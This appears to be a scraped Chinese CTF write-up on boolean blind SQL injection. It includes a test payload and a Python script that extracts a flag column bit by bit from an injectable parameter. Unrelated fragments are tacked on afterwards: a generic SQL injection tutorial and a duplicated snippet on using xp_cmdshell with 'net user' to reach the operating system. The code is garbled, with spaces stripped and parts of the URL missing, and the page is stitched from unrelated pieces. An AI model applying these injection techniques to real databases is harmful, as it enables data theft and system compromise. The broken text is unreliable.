6 簡單sql注入之3 11846238

2022-09-23 04:27:12 字數 942 閱讀 2763

進去輸入1觀察發現:

2,3都只有乙個結果hello!,我們輸入4觀察一下

發現空白,於是輸入sql注入語句:1' and '1'='1

沒有報錯,也有顯示hello!於是判斷出,該題目沒有過濾,只能用基於hello!回顯的sql注入

猜測資料庫,資料表,字段這些我就不浪費時間寫了,有想要了解的道友,可以自行百度,或留言交流,我這裡直接寫爆破flag表flag欄位的**就好了

**如下:

#!/usr/bin/python

#coding=utf-8

#author=one

importrequests

defmain():

n=0binary=""

flag=""

foriinrange(1,1000):

forjinrange(8):

url="'and1=if((ascii(substring((selectflagfromflag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0)%23"

request=requests.get(url)

if(request.text.find('hello!')!=-1):

binary='1'+binary

n=0else:

binary='0'+binary

n+=1

printchr(int(binary,2)),

flag+=chr(int(binary,2))

binary=""

if(n>=8):

print"\n"+flag

break

if__name__=='__main__':

main()

#上述**使用的是按位與方法,比普通迴圈遍歷所有可能字元要快,比較8次必得乙個字元結果

即可爆破出結果:

簡單SQL注入

sql注入思路 找注入點 判斷是否為注入點 猜表名 猜欄位名 爆出字段內容 那麼何為注入點?有引數進行資料庫傳遞的都可判為注入點。以此url為例 xx.xx show.asp?id 1 其中id即為引數,如果此url用sql語句來表示的話 則向資料庫中進行查詢的語句為 select from sho...

SQL注入詳解 6

高 級 篇 第一節 利用系統表注入sqlserver 資料庫 sqlserver 是乙個功能強大的資料庫系統,與作業系統也有緊密的聯絡,這給開發者帶來了很大的方便,但另一方面,也為注入者提供了乙個跳板,我們先來看看幾個具體的例子 master.xp cmdshell net user name pa...

SQL注入詳解 6

高 級 篇 第一節 利用系統表注入sqlserver 資料庫 sqlserver 是乙個功能強大的資料庫系統,與作業系統也有緊密的聯絡,這給開發者帶來了很大的方便,但另一方面,也為注入者提供了乙個跳板,我們先來看看幾個具體的例子 master.xp cmdshell net user name pa...